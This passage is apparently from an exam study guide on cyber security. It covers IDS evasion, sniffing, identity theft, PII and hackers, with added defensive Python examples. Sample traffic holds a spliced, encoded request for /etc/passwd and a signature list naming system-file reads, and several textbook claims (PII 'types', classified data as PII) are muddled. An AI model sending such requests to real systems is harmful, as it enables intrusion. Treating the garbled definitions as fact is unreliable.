(iv) Routers, bridges, and other WAN connections

(v) Drive space

(vi) Event log entries

(vii) File modes and existence

(viii) File contents.

In addition to the tools in table 2.1, several other commercial and freeware IDS and scanning tools can be deployed on a network to gather these probes. The most common are as follows —

(i) Flow-tools — A software package for collecting and processing NetFlow data from Cisco and Juniper routers.

(ii) Tripwire — Monitors the status of individual files and determines whether they were changed.

(iii) TCPdump — A freeware packet capture tool created by the Network Research Group at Lawrence Berkeley National Laboratory. Strictly it captures rather than detects, but it is one of the most popular building blocks of intrusion detection.

(iv) Snort — Another freeware and popular intrusion detection system that alerts on matching traffic and can log packets in tcpdump format.

(v) Portsentry — A port scan detector that shuts out attacking hosts, denying them access to any network host while notifying administrators.

(vi) Dragon IDS — Developed by Network Security Wizards, Inc., it is a popular commercial IDS.

(vii) TCP Wrappers — Logs connection attempts against protected services and evaluates them against an access control list before accepting the connection.

(viii) RealSecure — By Internet Security Systems (ISS). A very popular commercial IDS.

(ix) Shadow — The oldest IDS tool. It is also freeware.

(x) NetProwler — An intrusion detection tool that prevents network intrusions through network probing, system misuse, and other malicious activities by users.

(xi) Network Auditor — It gives the power to determine exactly what hardware and software is installed on the network and checks this for faults or changes.


Q.18. What are the different methods of evading IDSs ?


Ans. IDSs can be thwarted or bypassed by a number of methods. The principal methods used are —

(i) Session Splicing — In session splicing, the data to be delivered for the attack is spread out over multiple packets, thus making it more difficult for pattern matching techniques to detect an attack signature. Session splicing is characterized by a steady stream of small packets. Tools such as Nessus and Whisker incorporate session splicing methods.


(ii) Fragmentation Overlap — This approach attempts to foil an 
IDS by transmitting packets in a fashion that one packet fragment overwrites 
data from a previous fragment. The information in the packets is organized 
such that when the packets are reassembled, an attack string is sent to the 
destination computer. 

(iii) Fragmentation Overwrite — In this fragmentation attack, the 
total fragment data of one packet overwrites a previous fragment. When the 
target host assembles the fragments, an attack string results. 

(iv) Denial of Service — A DoS attack against an IDS attempts to 
flood the IDS so that it cannot function properly. The IDS will be consumed 
with the overwhelming traffic, allowing malicious code to slip through. Another 
effect is that a large number of alarms will be generated that cannot be 
processed by the alarm handling management systems. 


(v) Insertion — In an insertion attack, an IDS accepts a packet and 
assumes that the host system will also accept and process the packet. In fact, 
the host system will reject the packet. The IDS will, then, accumulate attack 
strings that will exploit vulnerabilities in the IDS and, for example, contaminate 
the signatures used in signature analysis. 


(vi) Evasion — An evasion attack is the opposite of an insertion attack 
in that a packet is rejected by an IDS, but accepted by the host system. 
Because the IDS rejects the packet outright, it does not check the packet 
contents. The packet can contain data that is used to exploit the host system. 


(vii) Obfuscating Attack Payload — If the attack payload in a packet 
is encoded or obfuscated, the IDS will not recognize the payload as an attack 
and pass it on the server for decoding. For example, the attack data could be 
encoded with Unicode. 


(viii) Polymorphic Code — If a continually changing signature is 
generated by encoding the attack payload with a polymorphic code, this 
signature would not match a signature in the attack signature database. 
Q.19. Write short note on sniffing. (R.GP.V., Dec. 2003, June 2004) 
Or 
What is sniffing ? (R.GP.V., Dec. 2015) 
Ans. Sniffing is the act of collecting packets from a network connection 
using either a special application or a piece of hardware called a sniffer. A 
sniffer takes a copy of and displays all of the traffic a network card sees. If 
implemented correctly, a sniffer is completely passive, having no effect on 
the traffic. Except for the fact that it takes processing time and memory, a 
sniffer should have no effect on its host computer. Ethereal, Ettercap, and 
Sniffer are some popular sniffers that allow for traffic collection, analysis, 
and TCP stream reconstruction. Traffic collection refers to the sniffer's ability 
to receive a copy of network traffic. Traffic analysis is the sniffer's ability to 
break out relevant fields (such as IP address) from the captured packets. A 
sniffer with good traffic analysis capabilities can easily display specified 
fields within the packet. It will also be able to recognize many different types 
of packets. Some even have the capability to analyze proprietary packet types. 
TCP stream reconstruction is the process by which a sniffer captures and 
reconstructs an entire TCP stream so that the user can see and analyze the 
traffic in an easy-to-understand manner. Some sniffers allow for almost 
complete stream reconstruction. They can pull out the data that is being passed 
within the traffic. This allows reconstruction of the sequence of mail commands 
that is passed between a mail host and a client, thus enabling debugging of the 
higher level protocols. For instance, SMTP could be debugged with the help 
of a sniffer. Sniffing is done for many reasons, with two of the most common 
being network performance analysis (boring) and spying. Sniffing will be 
used as a tool to further our spying capability. 


Q.20. What are the types of sniffing ? 

Ans. Protocol analyzers or packet sniffers come in two types — general 
and attack. A general packet sniffer captures all packets and sometimes has 
diagnostic tools to help you examine and troubleshoot packet contents and 
connections. There are many free software versions of these types of sniffers 
available. One of my favourite free sniffers is Wireshark. An attack sniffer, on 
the other hand, is a modified form of a general packet sniffer. An attack sniffer 
is only looking for certain kinds of packets, like the authentication information 
in telnet packets, or credit card information in HTTP connections. Basically, 
the attacker has modified the software of a general sniffer to capture specific 
kinds of traffic that will be useful for other types of attacks. 


Q.21. Write a short note on password sniffing. (R.GP.V., Nov. 2018) 


Ans. Password sniffing is an attack on the Internet that is used to steal 
username and password from the network. It was the worst security problem 
on the Internet in 1990s. In 1990s every week there was a news about password 
sniffing attack. Since now-a-days strong encryption is used for protecting 
passwords, so it is mostly of historical interest. 
Password sniffing can also be termed as network sniffing. It is the 
intercepting, monitoring and capturing of data packets in traffic of a network, 
especially in Local Area Network (LAN). The motive of network sniffing is to 
steal information such as usernames, passwords, network messages etc., in the 
form of packets using a sniffer software program like Wireshark. Another 
mean of passive attack is network sniffing, to abstract useful information like 
Internet Protocol (IP) address ranges, hidden servers or networks, and other 
available services on the system or network. 
The password sniffing problem was mostly solved by SSH, which replaced 
several prior insecure protocols. Hashing of passwords or encryption has also 
been introduced by many other protocols, which makes password sniffing 
attack less practical. Even then various other credential stealing and replay 
attacks are still widely used. Man-in-the-middle attack is being commonly 
used for stealing passwords and credentials today. 

Q.22. How can the password sniffing be implemented ? What are the 
complications of password sniffing ? 

Ans. The typical implementation of a password sniffing attack involves 
gaining access to a computer connected to a local area network and installing 
a password sniffer on it. The password sniffer is a small program that listens 
to all traffic in the attached network(s), builds data streams out of TCP/IP 
packets, and extracts user names and passwords from those streams that 
contain protocols that send cleartext passwords. 

In network sniffing attack, the data from each TCP/IP stream can be 
separated and the information can be extracted from them. It is not a difficult 
attack to code. 

This attack can also be applied on switches, routers and printers. 
Now-a-days it is common for attackers to install presence on such devices. They 
don't run antivirus and are not easy to audit. Since, traffic naturally goes 
through switches and routers, so no extra network packets need to be sent to 
fool switches into sending traffic of interest to the listening node. 


Complications of Password Sniffing — Many developments have made 
password sniffing difficult besides adding encryption. Even though the encryption 
is the only reliable solution, and due to man-in-the-middle attack risks, the 
encryption must include proper authentication of communicating parties. 

In 1990s every host was able to see all traffic in the network because of 
the thick ethernet cable that was common at that time. So it was enough to put 
the interface into promiscuous mode to see all traffic. Switches and star-like 
network topologies are used by networks today, which make this more difficult. 
However, it is possible to fool switches to send traffic to any host, or perform 
the attack on the switch itself. 
MAC addresses for each network port in switches are hard-coded by 
some enterprises and updates and passwords are set on switches. Some 
configurations make this attack difficult. However, it is impossible to control 
switches and routers on long-distance connections. 
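The IDS evasions listed under Q.18 (session splicing, obfuscated payloads, fragment overlap) and the stream-building behaviour of a password sniffer described under Q.22 come down to the same point: what matters is the reassembled byte stream, not the individual packets. The following Python program is an added example, not code from the original text or from any of the tools named above; the traffic, addresses, ports and signatures in it are constructed. It rebuilds TCP streams from segments, shows that per-packet signature matching misses a spliced and percent-encoded request that stream-level matching catches, and, as an audit check, reports flows in which a login crossed the wire in cleartext without extracting the password itself.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample traffic: every address, port and payload below is made up.
# A segment is (flow, seq, payload), flow = (src_ip, src_port, dst_ip, dst_port).
# Flow A: one HTTP request spread over tiny segments (session splicing) whose
#         path is percent-encoded (obfuscated payload).
# Flow B: an FTP login, whose USER/PASS commands travel in cleartext.
# Flow C: an ordinary, harmless request.
FLOW_A = ("10.0.0.5", 40001, "10.0.0.9", 80)
FLOW_B = ("10.0.0.7", 40002, "10.0.0.9", 21)
FLOW_C = ("10.0.0.8", 40003, "10.0.0.9", 80)
SEGMENTS = [
    (FLOW_A, 1, b"GET /cgi"),
    (FLOW_A, 9, b"-bin/vi"),
    (FLOW_A, 16, b"ew?f=%2fetc%2fpa"),
    (FLOW_A, 32, b"sswd HTTP/1.0\r\n\r\n"),
    (FLOW_B, 1, b"USER alice\r\n"),
    (FLOW_B, 13, b"PASS hunter2\r\n"),
    (FLOW_C, 1, b"GET /index.html HTTP/1.0\r\n\r\n"),
]

# Constructed content signatures, in the spirit of a Snort "content:" match.
SIGNATURES = {
    "request for /etc/passwd": b"/etc/passwd",
    "request for cmd.exe": b"cmd.exe",
}

# Destination ports of protocols that send the password unencrypted.
CLEARTEXT_LOGIN_PORTS = {21: "ftp", 23: "telnet", 110: "pop3"}


def normalize(data):
    """Undo percent-encoding so an obfuscated payload matches the same
    signature as its plain form (one layer only; production engines also
    handle Unicode and double encoding)."""
    return unquote_to_bytes(data)


def reassemble(segments):
    """Rebuild each TCP stream by placing every payload byte at its sequence
    offset.  Overlapping ranges keep the byte that arrived first; an IDS must
    use the same overlap policy as the host it protects, otherwise the
    fragmentation overlap/overwrite evasions make it see a different stream
    than the target does."""
    tables = defaultdict(dict)                      # flow -> {offset: byte}
    for flow, seq, payload in segments:
        table = tables[flow]
        for i, byte in enumerate(payload):
            table.setdefault(seq + i, byte)         # first arrival wins
    return {flow: bytes(t[k] for k in sorted(t)) for flow, t in tables.items()}


def per_packet_alerts(segments, signatures=SIGNATURES):
    """Naive matching: each segment inspected on its own.  Session splicing
    defeats this because no single segment carries the whole signature."""
    return [(flow, name)
            for flow, _seq, payload in segments
            for name, pattern in signatures.items()
            if pattern in normalize(payload)]


def stream_alerts(segments, signatures=SIGNATURES):
    """Matching over the reassembled and normalized stream."""
    return [(flow, name)
            for flow, data in reassemble(segments).items()
            for name, pattern in signatures.items()
            if pattern in normalize(data)]


LOGIN_RE = re.compile(rb"USER (\S+)\r\n(?:.*\r\n)*?PASS \S+\r\n")


def cleartext_logins(segments):
    """Audit check: report flows in which a username/password pair crossed
    the wire in cleartext.  Only the username is returned; the password is
    deliberately not extracted."""
    findings = []
    for flow, data in reassemble(segments).items():
        proto = CLEARTEXT_LOGIN_PORTS.get(flow[3])
        if proto is None:
            continue
        match = LOGIN_RE.search(data)
        if match:
            findings.append((flow, proto, match.group(1).decode("ascii", "replace")))
    return findings


if __name__ == "__main__":
    print("per-packet alerts :", per_packet_alerts(SEGMENTS))
    print("stream alerts     :", stream_alerts(SEGMENTS))
    print("cleartext logins  :", cleartext_logins(SEGMENTS))
```

Run stand-alone, the per-packet pass reports nothing for flow A while the stream pass reports the `/etc/passwd` signature, and the audit names flow B as an FTP login sent in cleartext; the "first arrival wins" overlap policy in `reassemble` is the knob that has to agree with the protected host's TCP stack.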


Q.23. What do you mean by identity theft ? 

Ans. When someone claims to be someone else to steal money or get 
other benefits then this fraud is referred to as identity theft. When someone 
else's identity is used by a criminal or a fraud person then this theft occurs. 
The person whose identity is used can face various problems when he/she is 
held responsible for the criminal's actions. Using another person's id for 
personal gain is declared as crime at some specific levels, in many countries. In 
India, it is also a punishable offense under the section 66C and section 66D 
of the Indian IT Act. 

A non-profit organization was formed in the US, with the objective to 
support the society for spreading awareness about ID theft fraud because of 
its severity. This organization was named as Identity Theft Resource Center 
(ITRC). 

In 2010, a report was published by Javelin Strategy in its research paper 
that the number of identity fraud victims increased by 12% during 2009, 
and the amount of fraud increased by 12.5%. 




The statistics were provided by the Federal Trade Commission (FTC) about 
the identity fraud, in which the prime frauds mentioned are given below — 


(i) Loan Fraud — The loan fraud was 5% at that time. When a loan 
is applied on victim’s name by attacker then this fraud occurs. 


(ii) Government Fraud — There are 9% of government frauds which 
include SSN, driving license and income tax fraud. 


(iii) Employment Fraud — There are 12% of employment frauds 
Where the attacker borrows the victim’s valid SSN. 


(iv) Bank Fraud — Besides credit card frauds, ATM and cheque 
frauds have been reported. There are 17% of bank frauds. 


(v) Credit Card Frauds — There are 26% of credit card frauds. These 
are the highest rated frauds. In this fraud the victim's credit card number is acquired 
by someone else and used for making purchase. 
Q.24. What a person can do to protect himself/herself from identity 
theft ? (R.GP.V., Nov. 2019) 

Ans. Since our identity and/or personal information are displayed on the 
internet every time, so we can be a victim of identity theft or fraud. Hence 
internet users should erase their identity and/or protect their ID, and the 
information about them, available on the Internet. Since, it is impossible to 
have a tool that erases all information completely from the Internet, so a person 
can do the following to protect himself/herself from identity theft — 
(i) Monitoring of Credit — The information about our credit accounts 
and bill payment history are contained in the credit report, so someone can 
impersonate us. So we should be aware of suspicious signs. The identity protection 
services can also be used for extra security, which range from credit monitoring 
to database scanning. 
(ii) Using Updated Web Browser — An updated web browser should be 
used every time to make sure that we are taking advantage of its current safety 
features. 

(iii) Keeping Records of Financial Data and Transactions — Our 
statements should be reviewed time to time for any activity and change that 


we have not made. 

(iv) Installing Security Software — We should install antivirus and 
antispyware softwares, and keep these security softwares up to date as a safety 
measure against online intrusions. 

(v) Storing Sensitive Data Securely — We should keep our online 
sensitive information secured. We can store these online information securely 
by using file encryption software. 

(vi) Protecting Our Personally Identifiable Information — We should 
not provide our personally identifiable information to any other person. We 
should provide these informations only after finding out why the information is 
needed and whether it needs to be provided or not. We should carefully share our 
personal information on social networking sites. 

(vii) Staying Alert to the Latest Scams — We should be aware to 
protect against fraud. We should also create awareness in our family and 
surroundings by sharing security tips with everyone. 


Q.25. Write a short note on personally identifiable information (PII). 


Ans. The attacker always tries to find the information by using which a 
single person can be located, contacted or identified or by using which a 
single individual can be uniquely identified out of other sources. Personally 
identifiable information is based on four common types viz., personal, 
personally, identifiable and identifying. 

The elements given below are attempted to be stolen. These elements can 
be used for distinguishing individual identity — 
(i) Full name of user 
(ii) Residence and office telephone number and mobile number 
(iii) PAN card number 
(iv) Credit/Debit card number 
(v) D.O.B. 
(vi) Driver's license number 
(vii) E-mail address/Online account details etc. 
The personally identifiable information can also be divided into two 
categories as — 
(i) Classified Information — The subcategories of classified 
information are — 
(a) Secret — National security policies, military plans etc. are 
secret informations. The disclosure of these informations can damage the 
national security. So these informations require protection. 

(b) Top Secret — Information that need very high protection 
and unauthorized disclosure could severely damage national security e.g., vital 
defense plans. 
(c) Confidential — Information about strength of armed forces 


and other technical information related to police/CBI etc. are confidential 
information. The disclosure of these information to an unauthorized person 
may damage national security. 

(ii) Non-classified Information — The subcategories of non-classified 
information are — 

(a) Confidential Business Information — Sales and marketing 
plans, new product plans etc. are confidential business information. If these 
informations get disclosed then it may give loss in business. 

(b) Routine Business Information — The business information 
that can be shared inside or outside of the business time to time and do not 
require any special protection. 

(c) Private Information — The credit card details, debit card 
details etc. are private information. These information can be associated with 
an individual. 

(d) Personal Information — The informations such as e-mail 
ID, addresses, phone numbers, mobile numbers etc. are personal information. 
These informations belong to a private individual but can be shared with others 
for business or other purposes. 

(e) Public Information — The information that is publicly 
available or matter of public knowledge. 
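To find the PII elements listed above in stored data (the kind of scan a data-protection check runs before such records leak), the following Python program is an added example and not part of the original text. The sample record and every number in it are constructed; the PAN layout (five letters, four digits, one letter) and the Indian mobile number layout used in the patterns are assumptions about those formats. Card-number candidates are verified with the Luhn checksum so arbitrary digit runs are not reported, and each finding is redacted so the report does not itself become a new copy of the PII.

```python
import re

# Constructed sample record; every name, number and address in it is made up.
SAMPLE = (
    "Customer: Asha Verma, DOB 14/08/1990, mobile +91 98765 43210\n"
    "e-mail asha.verma@example.com, PAN ABCDE1234F\n"
    "card on file 4111 1111 1111 1111; superseded card 1234 5678 9012 3456\n"
)

# Patterns for the PII elements listed in the text (Indian formats assumed
# for PAN and mobile numbers).
PATTERNS = {
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "pan": re.compile(r"\b[A-Z]{5}[0-9]{4}[A-Z]\b"),
    "dob": re.compile(r"\b\d{2}/\d{2}/\d{4}\b"),
    "indian_mobile": re.compile(r"(?<!\d)(?:\+91[ -]?)?[6-9]\d{4}[ -]?\d{5}(?!\d)"),
    "card_number": re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)"),
}


def luhn_ok(digits):
    """Luhn checksum used by payment card numbers; filters out runs of
    digits that merely look like a card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def redact(kind, value):
    """Keep only enough of the value for a reviewer to confirm the finding."""
    if kind == "email":
        local, domain = value.split("@", 1)
        return local[0] + "***@" + domain
    compact = re.sub(r"[^A-Za-z0-9]", "", value)
    return "*" * (len(compact) - 4) + compact[-4:]


def find_pii(text):
    """Return (kind, redacted value) for each PII element found in text."""
    findings = []
    for kind, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            value = match.group(0).strip()
            if kind == "card_number" and not luhn_ok(re.sub(r"\D", "", value)):
                continue                      # digit run that is not a real card number
            findings.append((kind, redact(kind, value)))
    return findings


if __name__ == "__main__":
    for kind, shown in find_pii(SAMPLE):
        print(f"{kind:14} {shown}")
```

The second card number in the sample fails the Luhn check and is dropped, which is what keeps a scanner like this from flagging order numbers and timestamps; the regular expressions are deliberately narrow, so a production scan would add the other elements from the list (driver's licence, account identifiers) with their own validated formats.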
Q.26. Explain the types of identity theft. 

Ans. Since the identity of someone is stolen for committing a crime, 
there are many types to which identity theft is related. Some of them are as 
follows — 

(i) Financial Identity Theft — The US Secret Service has investigated 
25 types of financial identity thefts in total. Bank fraud, credit card fraud 
etc. are financial identity thefts. When someone else's identifying details, 
such as name, address, bank account details, etc. are used by fraudsters to 
commit fraud that is applicable on victim's finances e.g., new credit card 
accounts can be opened in the name of victim and the card charges up, payment 
is neglected, leaving the victim with bad credit history and large sums of 
debt. Sometimes the fraudsters are able to open a new bank account, 
completely taking over the victim's identity. He/she can purchase a vehicle, 
can get a mortgage loan etc. by using victim's identity. 

To recover from this crime is expensive, time consuming and sometimes 
psychologically painful. A fraudster may be capable to spend thousands to 
lakhs of rupees, before the crime is detected, in victim's name. 


(ii) Criminal Identity Theft — To commit a crime such as entering 
into a country, and any terrorist activity, by taking over someone else's identity 
is known as criminal identity theft. Computer and cybercrimes, organized 
crime, drug trafficking, alien smuggling and money laundering can also be 
included in this crime/criminal activity. 

The identity theft is not always for stealing money or to destroy victim's 
credit. A fraudster may use the victim's name upon arrest/during a criminal 
investigation, and may provide counterfeited information to the law 
enforcement officer. The victim of criminal ID theft may not know for a long 
time that a warrant has been issued in his/her name. 


(iii) Identity Cloning — The most frightening variation of all identity theft is 
identity cloning. The cloning of identity compromises the victim's life by actually 
living and working as victim, besides stealing the personal information for 
financial gain or committing crimes in the victim's name. However, a cloner of ID 
may pay bills regularly, get engaged and even get married. It means that, like 
victim's life, the fraudster may live a natural and usual life, may be at a different location. 

As much information as possible are obtained by an identity cloner. They 
will try to find all information related to the victim such as in which city or 
state the victim was born, in which street he/she lives, where he/she attended 
the school, how many members are there in his/her family etc. 


(iv) Business Identity Theft — The information about the business/ 
organization privileged in nature and/or proprietary information which, when 
compromised through alteration, corruption, loss, misuse or unauthorized 
disclosure, could cause big damage to the organization, is known as business 
sensitive information (BSI). Bust-out is a scheme that fraudsters use. In 
comparison to individual's ID theft it is paid less importance. A space is rented by 
the fraudster in the same building as victim's office. After that corporate credit 
cards are applied for in the company's name. Since the company's name and 
address matches, the application passes credit check, but the cards are delivered 
to the fraudster's mailbox. These cards are used by fraudster and destroyed before 
the victim comes to know that the firm's credit is badly damaged. 


s jm comes : 

(v) Medical Identity Theft — Now-a-days, India has become famous 
for medical tourism. Because of reasonably priced medical services and good 
quality, India has made a name, so many tourists visit India every year with dual 
purpose, seeing the country plus getting their medical problems attended to. 
Thousands of medical records of foreigners as well as locals are created in 
this process. 
Healthcare facilities now are very different compared to how they were 
used before. When multiple agencies are connected over computer networks 
and Internet, these are great opportunities for protected health information (PHI). 
Now the bulky paper records are changed by medical facility providers to 
electronic records, which are faster and easier to file and trace, even though the 
concept of medical ID theft is growing. The people who need the stolen information 
buy it from fraudsters, or the fraudster can use this information for other purposes. 
If the victim's identity is successfully stolen by a fraudster and he receives 
the treatment, then this becomes the part of victim's permanent medical record. 


(vi) Synthetic Identity Theft — In this theft, the fraudster takes some 
part of information from many victim's identity and combine them to generate 
a new ID, which is not of a specific person. But this can affect all the persons 
whose information is used. This is an advanced form of identity theft. 

(vii) Child Identity Theft — The identity of a child is stolen by their 
parents to open bank accounts, credit card accounts or even to take out loans 
because their own credit history is too damaged or not sufficient. This theft is 
known as child identity theft. 


Q.27. Describe the various techniques of identity theft. 
Ans. The techniques of identity theft are given below — 

(i) Traditional/Human-based Methods — In this technique there is 
no use of technology, and/or minimal use of technology. Following are the 
subcategories of human based methods — 

(a) Direct Access of Information — People who are very much 
trusted by the victim such as peon, friends, relatives, roommates etc. can 
obtain an authorized access to a business or residence to steal the personal 
information. 

(b) Dumpster Diving — Retrieving the documents by looking 
into the trash for information written on pieces of paper. In this the business 
or residential trashes are rummaged to find useful free items. It is also called 
binning, trashing, dumpstering. 

(c) Wallet Theft — Pickpockets steal the wallets in a public place 
or in street and sell the personal information received from the wallet. Our 
wallet often contains Aadhar card, PAN card, driving licence, credit/debit 
card etc. 

(d) Mail Theft and Rerouting — Since the mailbox has no 
security mechanism, so it is easy to steal mails from it and all information 
which are freely available to the fraudster. 

(e) Shoulder Surfing — People who are standing in public 
facilities such as in cybercafes, near ATMs keep watch over a person's 
shoulder while he/she logs into the system and grab personal information. 

(f) Skimming — It is possible to install a mini equipment on a 
valid ATM, just as to imitate an ATM. Card informations are captured by this 
equipment and used to make duplicate cards. The PIN can be obtained by 
stealing the films of camera. 

(g) Dishonest or Mistreated Employees — The personal files, 
salary information, bank information etc. can be accessed by an employee or 
partner, to gather all type of confidential information. The fraudster then can 
make sufficient damage by using these informations. 

(h) Fake Telephone Calls — In this method the caller asks the 
victim to verify his/her account details immediately otherwise his/her bank 
account or ATM card will be suspended. This is very effective method of 
collecting information. 

(ii) Computer-based Techniques — In these techniques the attackers 
make an attempt to exploit the vulnerabilities within existing processes and/or 
systems. The computer-based techniques of ID theft are — 

(a) Backup Theft — In this method attackers also strike public | 
facilities like transport areas, hotels, etc. as well as stealing equipment from 
private buildings. The stolen equipments or backups are carefully analyzed by 
them to recover the data. | 

(b) Hacking and Database Theft — The information systems 
are attempted to compromise with various tools, methods and techniques to 
get unauthorized access by criminals, besides the stealing of equipment. 
(c) Phishing — In this method, the phishers try to get the user to 
disclose personal details such as credit card numbers, passwords, account 
information by convincing the user to provide it necessarily. 

(d) Pharming — In this method, the typo or matching websites 
of the website are set up by the attacker. Here the websites with the same 
look and feel are installed. 
(e) Redirectors — Here the users' network traffic is redirected to 
locations they did not intend to visit. The highest volume in traffic occurs 
using malicious code that simply modifies the victim's DNS server settings or 
host files to redirect DNS lookups to a fraudulent DNS server. 

Q.28. What is the cyberterrorism ? Discuss in detail. (R.GP.V., Nov. 2018) 
Ans. The term cyberterrorism was introduced by Barry Collin in 1997, 
who was a senior research fellow at the Institute for Security and Intelligence 
in California. It is likely to be a controversial term. A very narrow definition 
was chosen by some authors, relating it to the deployment, by known terrorist 
organizations, of disruption attacks against information systems for the primary 
purpose of creating alarm and panic. But this narrow definition made it difficult 
to identify any instance of cyberterrorism. Then Kevin G. Coleman of the 
Technolytics Institute defined cyberterrorism as — 
"The premeditated use of disruptive activities, or the threat thereof, against 
computers and/or networks, with the intention to cause harm or further social, 
ideological, religious, political or similar objectives or to intimidate any person 
in furtherance of such objectives." 

The term cyberterrorism has two words — cyber which is familiar to most 
of the people and terrorism which is less familiar. Since we can understand the 
term cyber but the term terrorism is difficult to define. The ambiguity in the 
definition brings in vagueness in action, as D. Denning pointed out in her work 
saying that "An e-mail bomb may be considered as hacktivism by some and 
cyberterrorism by others". Everybody can understand the term cyberterrorism, 
either from the popular media or from the personal experience. The convergence 
of cybernetics and terrorism was defined as cyberterrorism by Barry Collin. 
The special agent for the FBI gave a definition in the same year. 
"Cyberterrorism is the premeditated, politically motivated attack against 
information, computer systems, computer programs and data which result in 
violence against noncombatant targets by sub national groups or clandestine agents." 
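Returning to the pharming and redirector techniques listed under Q.27 (ii)(d) and (e) above: a defender's two first checks are whether the local hosts file pins a sensitive domain to a static address, and whether a domain name a user is about to trust is a near-miss spelling of one they actually mean. The following Python program is an added example, not code from the original text; the hosts-file content and the protected domain list are constructed, and the edit-distance threshold of 2 is an assumed tuning value.

```python
# Constructed hosts-file content; every address and name below is made up.
HOSTS_SAMPLE = """# standard loopback entries
127.0.0.1   localhost
::1         localhost

# the kind of line a redirector leaves behind: a bank's name pinned to an address
203.0.113.7 www.examplebank.com examplebank.com
192.168.1.50 printer.local
"""

# Domains whose resolution must never be overridden locally (constructed list).
PROTECTED_DOMAINS = ["examplebank.com", "mail.example.org"]


def parse_hosts(text):
    """Return (address, hostname) pairs from hosts-file text, ignoring comments."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        address, *names = line.split()
        for name in names:
            entries.append((address, name.lower()))
    return entries


def covered_by(name, domain):
    """True if name is the domain itself or one of its subdomains."""
    return name == domain or name.endswith("." + domain)


def hosts_overrides(text, protected=PROTECTED_DOMAINS):
    """Hosts entries that pin a protected domain to a static address.
    Any such entry bypasses DNS and deserves review."""
    return [(address, name)
            for address, name in parse_hosts(text)
            for domain in protected
            if covered_by(name, domain)]


def levenshtein(a, b):
    """Edit distance (insert, delete, substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def typosquat_of(candidate, protected=PROTECTED_DOMAINS, max_distance=2):
    """Return the protected domain that candidate closely imitates, if any.
    An exact match is the genuine domain and is not reported."""
    candidate = candidate.lower().strip(".")
    best = None
    for domain in protected:
        d = levenshtein(candidate, domain)
        if 0 < d <= max_distance and (best is None or d < best[0]):
            best = (d, domain)
    return best[1] if best else None


if __name__ == "__main__":
    print("hosts overrides:", hosts_overrides(HOSTS_SAMPLE))
    for name in ("examp1ebank.com", "examplebnak.com", "examplebank.com"):
        print(name, "->", typosquat_of(name))
```

A hosts-file override is also how legitimate test setups redirect a name, so findings from `hosts_overrides` are a review queue rather than something to delete automatically; the edit-distance check is the simple form of what browser phishing filters and brand-monitoring services do at scale.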


Q.29. What is virtual crime ? Explain. 
Ans. The term virtual crime has a part of problem within the word 'virtual', 
which in the digital age has become increasingly lacking of meaning. Sometimes 
virtual refers to things that are practically the same in effect as the term 'real'; 
sometimes it simply refers to representations of things "created 
or carried on by means of a computer or computer network." 
Virtual crimes can be equated to cybercrimes by a narrower definition, 
defining those as crimes committed by means of a computer or computer 
network. Massively multiplayer online game (MMOG) is an example of 
virtual crimes. We can only describe the virtual crime by MMOG. So we can 
say that virtual crimes are limited to only MMOG. MMOG is a video game 
which is played and accessed by thousands of players with the conditions that 
Internet access and at least one permanent virtual world is needed. There are 
many forms of MMOG, some of them are — 

(i) MMORPG - Massively Multiplayer Online Role-Playing Game 
(ii) MMORTS - Massively Multiplayer Online Real Time Strategy 
(iii) MMOFPS - Massively Multiplayer Online First Person Shooter 
(iv) MMOSG - Massively Multiplayer Online Social Game. 

The first multiplayer online game was introduced in 1987 and it became 
popular in 1990s. The most recent advancement in the scope of MMOG is 
Second Life in MMOSG. Now the authors of MMOG are calling it "3D virtual 
world" instead of "Game". Second Life is a parallel virtual world with 
inhabitants, who perform their own ideas and needs such as communicating 
among them, meeting new friends, buying, studying, entertaining themselves 
in bars or cafes etc. 
Now worldwide known companies like Dell, Adidas, Mazda, Vodafone, 
Philips etc. and hundreds of others have joined this virtual world for new 
product testing and for the support of real product sale. So this game is now 
not only for fun but for other activities also. 

The connection between real world and virtual world can be established 
on several levels. Few months ago there was a news that Second Life has 
its first millionaire named Anshe Chung who was an avatar created by Ailin 
Graef and her husband. 

They earned their first million by virtual real estate trading. Although only 
Linden dollars can be paid in Second Life, Linden dollars can be purchased and 
sold for real money (US dollars) in LindenX exchange office or in exchange 
offices of third parties. 
In Second Life, all rights are assigned to the authors of created world, like 
creating characters, clothing, scripting, objects and other design. So these 
possibilities give freedom for fraudulent acts and for infringements of intellectual 
property law. In 2007 six dealers who were offering their goods in Second Life 
filed an action against another user for an illegal copy of digital wares. 

In other MMOG types we can find that individuals are abusing the virtual 
environment with the intent to enrich themselves. Other examples like gold 
farming or virtual mugging among the well-known illegal practices can be 
included. 
PERCEPTION OF CYBER CRIMINALS — HACKERS, 
INSURGENTS AND EXTREMIST GROUP ETC., 
WEB SERVERS HACKING, SESSION HIJACKING 


Q.30. Write a short note on hackers. 
Ans. The meaning of the word hacker has been changed over the years 
with the change in technology. In present, there are two opposite meanings of 
hackers. First, a computer enthusiast as an individual who enjoys exploring 
the details of computers and how to stretch their capabilities, though most of 
the users prefer to learn only the minimum necessary. The second and opposite 
meaning is a curious busybody who tries to discover information by poking 
around. 
The people, who were highly knowledgeable about computing, were 
considered as hackers. They were considered computer experts who could 
do plenty through programming on computer. 
The process of gaining unauthorized access into a computer system for 
different purposes is known as hacking. Hacking has been used as a political 
or social demonstration during international crises. 

Q.31. Explain different types of hackers. 
Ans. Based on the phenomena of hacking there are several types of hackers. 


Some of them are as follows — 

(i) Crackers — The attacker, who breaks security of a system is 
known as cracker. Crackers are professional security breakers and thieves. 
The term cracker was coined by purist hackers, who wanted to differentiate 
themselves from individuals with criminal motives whose sole purpose is to 
sneak through security systems. Purist hackers were worried that journalists 
were misusing the word hacker. They were worried that mass media has 
failed to differentiate computer enthusiasts and computer criminals. 

